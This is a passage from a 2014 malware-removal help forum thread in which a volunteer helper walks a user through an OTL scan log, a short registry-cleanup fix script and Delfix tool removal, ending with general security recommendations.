"UDP Query User{18874B1D-A553-4BD6-937B-53201E53CB6C}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=17 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
"UDP Query User{2E662723-25A0-4A5A-AE58-095ECB309858}C:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe" = protocol=17 | dir=in | app=c:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{031A0E14-0413-4C97-9772-2639B782F46F}" = Common Desktop Agent
"{07EEE598-5F21-4B57-B40B-46592625B3D9}" = Zune Language Pack (PTB)
"{171C7193-1BB5-4619-BF23-E962598CAB13}" = Intel® Trusted Connect Service Client
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}" = Garmin ANT Agent
"{230D1595-57DA-4933-8C4E-375797EBB7E1}" = Atheros Bluetooth Suite (64)
"{23F2C78C-E131-4CA0-8F84-3473FB7728BA}" = Microsoft Security Client
"{2C4E2E4E-A7C9-4CCB-BF03-FE6EBD5D4AB7}" = Windows Mobile Device Updater Component
"{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}" = Premium Sound HD
"{5C93E291-A1CC-4E51-85C6-E194209FCDB4}" = Zune Language Pack (PTG)
"{5E2CD4FB-4538-4831-8176-05D653C3E6D4}" = Windows Live Remote Service Resources
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{656DEEDE-F6AC-47CA-A568-A1B4E34B5760}" = Windows Live Remote Service Resources
"{6740BCB0-5863-47F4-80F4-44F394DE4FE2}" = Zune Language Pack (NLD)
"{6B33492E-FBBC-4EC3-8738-09E16E395A10}" = Zune Language Pack (ESP)
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{7006ED29-58F2-40C3-AE87-039287AD20B6}" = Zune
"{787136D2-F0F8-4625-AA3F-72D7795AC842}" = Apple Mobile Device Support
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{847B0532-55E3-4AAF-8D7B-E3A1A7CD17E5}" = Windows Live Remote Client Resources
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8EB588BD-D398-40D0-ADF7-BE1CEEF7C116}" = Windows Live Remote Client Resources
"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010
"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010
"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036" = Microsoft .NET Framework 4.5.1 (Français)
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082" = Microsoft .NET Framework 4.5.1 (español)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{A679FBE4-BA2D-4514-8834-030982C8B31A}" = Windows Live Remote Service Resources
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 296.28
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 296.28
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Optimus" = NVIDIA Optimus 1.7.12
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.0213
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B750FA38-7AB0-42CB-ACBB-E7DBE9FF603F}" = Windows Live Remote Client Resources
"{B8BA155B-1E75-405F-9CB4-8A99615D09DC}" = iTunes
"{BE236D9A-52EC-4A17-82DA-84B5EAD31E3E}" = Zune Language Pack (DEU)
"{C22759DB-BA8B-30E7-99EE-8B47DB43AE56}" = Microsoft .NET Framework 4.5.1 (FRA)
"{C5D37FFA-7483-410B-982B-91E93FD3B7DA}" = Zune Language Pack (ITA)
"{C68D33B1-0204-4EBE-BC45-A6E432B1D13A}" = Zune Language Pack (FRA)
"{D6E5E5FE-83CF-3CFC-AF7A-11F05613705B}" = Microsoft .NET Framework 4.5.1 (ESN)
"{D8CC254C-C671-4664-9A38-FA368D1E2C97}" = SES Driver
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client
"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service
"{F87D3E88-3E80-4233-96EF-C3C392778A81}" = Cirrus Logic Audio x64
"24DA573F901348FFDFF7717497830D45BE0C362E" = Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2)
"4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20" = Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0)
"98157A226B40B173301B0F53C8E98C47805D5152" = Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0)
"D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2" = Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1)
"GIMP-2_is1" = GIMP 2.8.2
"Microsoft Security Client" = Microsoft Security Essentials
"Zune" = Zune
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{04668DF2-D32F-4555-9C7E-35523DCD6544}" = Control ActiveX de Windows Live Mesh para conexiones remotas
"{05E379CC-F626-4E7D-8354-463865B303BF}" = Windows Live UX Platform Language Pack
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0D261C88-454B-46FE-B43B-640E621BDA11}" = Windows Live Mail
"{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}" = VIZIO_FN_Key_Utility
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{240C3DDD-C5E9-4029-9DF7-95650D040CF2}" = Intel(R) USB 3.0 eXtensible Host Controller Driver
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype™ 6.20
"{26A24AE4-039D-4CA4-87B4-2F03217071FF}" = Java 7 Update 71
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros WLAN Client Installation Program
"{2902F983-B4C1-44BA-B85D-5C6D52E2C441}" = Windows Live Mesh ActiveX Control for Remote Connections
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{34319F1F-7CF2-4CC9-B357-1AE7D2FF3AC5}" = Windows Live
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{3A69FD31-5EE7-42C9-918B-81C07AA21043}" = Cirrus Logic Audio
"{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}" = VIZIO Wireless Driver
"{3B9A92DA-6374-4872-B646-253F18624D5F}" = Windows Live Writer
"{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}" = Garmin USB Drivers
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel(R) Rapid Storage Technology
"{3F0E78CA-735E-446D-8E60-69C6CA27EC95}" = VIZIO Wireless Touchpad
"{4814105D-5756-4CD7-9430-ADA474A3E192}" = USB3Setup
"{488F0347-C4A7-4374-91A7-30818BEDA710}" = Galerie de photos Windows Live
"{48C0DC5E-820A-44F2-890E-29B68EDD3C78}" = Windows Live Writer
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1" = VIZIOUtility version 1.0
"{55D003F4-9599-44BF-BA9E-95D060730DD3}" = Contrôle ActiveX Windows Live Mesh pour connexions à distance
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5D273F60-0525-48BA-A5FB-D0CAA4A952AE}" = Windows Live Movie Maker
"{62687B11-58B5-4A18-9BC3-9DF4CE03F194}" = Windows Live Writer Resources
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6727F16E-6BF0-4E73-AC73-958A382AA09E}" = Perfect Photo Suite 7.0.1
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6DEC8BD5-7574-47FA-B080-492BBBE2FEA3}" = Windows Live Movie Maker
"{77477AEA-5757-47D8-8B33-939F43D82218}" = Windows Live UX Platform Language Pack
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78DAE910-CA72-450E-AD22-772CB1A00678}" = Windows Live Mesh
"{7D1C7B9F-2744-4388-B128-5C75B8BCCC84}" = Windows Live Essentials
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{841F1FB4-FDF8-461C-A496-3E1CFD84C0B5}" = Windows Live Mesh
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver
"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8FF3891F-01B5-4A71-BFCD-20761890471C}" = Windows Live Messenger
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95763F66-297E-30CE-9728-6D0F20BF97F5}" = Google Talk Plugin
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = Realtek USB 2.0 Card Reader
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{9FAE6E8D-E686-49F5-A574-0A58DFD9580C}" = Windows Live Mail
"{A0C91188-C88F-4E86-93E6-CD7C9A266649}" = Windows Live Mesh
"{A41A708E-3BE6-4561-855D-44027C1CF0F8}" = Windows Live Photo Common
"{A6C48A9F-694A-4234-B3AA-62590B668927}" = Intel(R) Manageability Engine Firmware Recovery Agent
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}" = Apple Application Support
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AB61A2E9-37D3-485D-9085-19FBDF8CEF4A}" = Windows Live Messenger
"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.12) MUI
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{C893D8C0-1BA0-4517-B11C-E89B65E72F70}" = Windows Live Photo Common
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{DA909E62-3B45-4BA1-8B58-FCAEBA4BCEC9}" = NVIDIA PhysX
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{E727A662-AF9F-4DEE-81C5-F4A1686F3DFC}" = Windows Live Writer Resources
"{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}" = Galería fotográfica de Windows Live
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) OpenCL CPU Runtime
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Audacity_is1" = Audacity 2.0.5
"Easy Wireless Setup" = Samsung Easy Wireless Setup
"LAME_is1" = LAME v3.99.3 (for Windows)
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.3.1025
"Office14.SingleImage" = Microsoft Office Home and Student 2010
"Samsung Easy Printer Manager" = Samsung Easy Printer Manager
"Samsung Printer Live Update" = Samsung Printer Live Update
"Tweaking.com - Registry Backup" = Tweaking.com - Registry Backup
"VLC media player" = VLC media player 2.1.3
"WinLiveSuite" = Windows Live Essentials
========== HKEY_USERS Uninstall List ==========
[HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GoToMeeting" = GoToMeeting 5.3.0.1009
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9922
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9922
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9984
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9984
Error - 11/8/2014 2:03:34 PM | Computer Name = Ryan-PC | Source = WinMgmt | ID = 10
Description =
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9984
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9984
[ System Events ]
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7034
Description = The Intel(R) Management and Security Application User Notification
Service service terminated unexpectedly. It has done this 1 time(s).
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7034
Description = The NVIDIA Update Service Daemon service terminated unexpectedly.
It has done this 1 time(s).
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7031
Description = The Windows Media Player Network Sharing Service service terminated
unexpectedly. It has done this 1 time(s). The following corrective action will
be taken in 30000 milliseconds: Restart the service.
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7031
Description = The Windows Search service terminated unexpectedly. It has done this
1 time(s). The following corrective action will be taken in 30000 milliseconds:
Restart the service.
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7032
Description = The Service Control Manager tried to take a corrective action (Restart
the service) after the unexpected termination of the Windows Search service, but
this action failed with the following error: %%1056
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7038
Description = The WMPNetworkSvc service was unable to log on as NT AUTHORITY\NetworkService
with the currently configured password due to the following error: %%50 To ensure
that the service is configured properly, use the Services snap-in in Microsoft
Management Console (MMC).
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7000
Description = The Windows Media Player Network Sharing Service service failed to
start due to the following error: %%1069
Error - 11/8/2014 2:02:40 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
cdrom
Error - 11/8/2014 3:40:54 PM | Computer Name = Ryan-PC | Source = bowser | ID = 8003
Description =
Error - 11/8/2014 9:57:49 PM | Computer Name = Ryan-PC | Source = BTHUSB | ID = 327697
Description = The local Bluetooth adapter has failed in an undetermined manner and
will not be used. The driver has been unloaded.
< End of report >
After running this script please tell me how the computer is at the moment.
Run OTL.
Please copy the text in the Quote box below, (Do Not copy the word Quote), and paste it in the Posted Image box in OTL.
Under the Custom Scans/Fixes box at the bottom, paste in the following
https://dl.dropbox.com/u/73555776/OTL_Fix.GIF
To do that:
Highlight everything inside the quote box, (except the word Quote), right click the mouse and click Copy.
Copy (Ctrl+C) and Paste (Ctrl+V) all of the following text into the Custom Scans/Fixes box:
:OTL
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
:commands
[EMPTYFLASH]
[resethosts]
Click Run Fix.
Please post the contents of the fix log file back here if you are prompted to open the file. It can also be found at C:\_OTL\Moved Files as MMDDYYY_HHMMSS.log where MMDDYYY is date format and HHMMSS is time format.
If requested to reboot, please do so. The log file will open after restart.
Enable back your security softwares as soon as you completed the OTL fix steps.
ascot1340
2014-11-10, 04:29
The computer seems to be running normally at the moment. Here is the OTL log.
========== OTL ==========
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page| /E : value set successfully!
Registry key HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@Apple.com/iTunes,version=\ deleted successfully.
File PTYFLASH] not found.
File sethosts] not found.
OTL by OldTimer - Version 3.2.69.0 log created on 11092014_212619
I feel like we need to give it a day and see what happens :)
ascot1340
2014-11-11, 03:06
I'll keep an eye on it and report back. Thanks!
ascot1340
2014-11-12, 03:12
Still seems fine
Download Delfix from here (http://general-changelog-team.fr/fr/downloads/finish/20-outils-de-xplode/9-delfix)
Ensure Remove disinfection tools is ticked
Also tick:
Create registry backup
Click Run
Purge system restore
http://www.hdrcgb.org.uk/g2g/delfix.jpg
Any other tools and files found can simply be deleted or uninstall via Add/Remove Programs in the Control Panel etc.
Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP
The following programmes come highly recommended in the security community.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xKsUqI5A.png.pagespeed.ic.vn1Hlvqi8h.jpgAdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
http://i.imgur.com/E8I37RF.pngCryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (eg.CryptoPrevent), preventing your files from being encrypted.
http://i.imgur.com/EG85Vjt.png Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/x6YRrgUC.png.pagespeed.ic.HjgFxjvw2Z.jpgMalwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xjv4nhMJ.png.pagespeed.ic.A5YbWn1eDO.png NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
http://i.imgur.com/3O8r9Uq.png (http://www.sandboxie.com/) Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/DgW1XL2.png.pagespeed.ce.v1OlJl_ZAS.png Secuina PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xj1OLIec.png.pagespeed.ic.k6hhwopU0q.jpg SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xJEP5iWI.png.pagespeed.ic.4tmM1lM7DQ.pngWeb of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.
ascot1340
2014-11-13, 00:03
Ok, ran the Delfix. I'll let you know if the problem returns. Thanks again for all of your help!
Glad we could help. :)http://i204.photobucket.com/albums/bb106/Juliet702/sparkle.gif
Glad we could help. :)http://i204.photobucket.com/albums/bb106/Juliet702/sparkle.gif
Since this issue appears resolved ... this Topic is closed.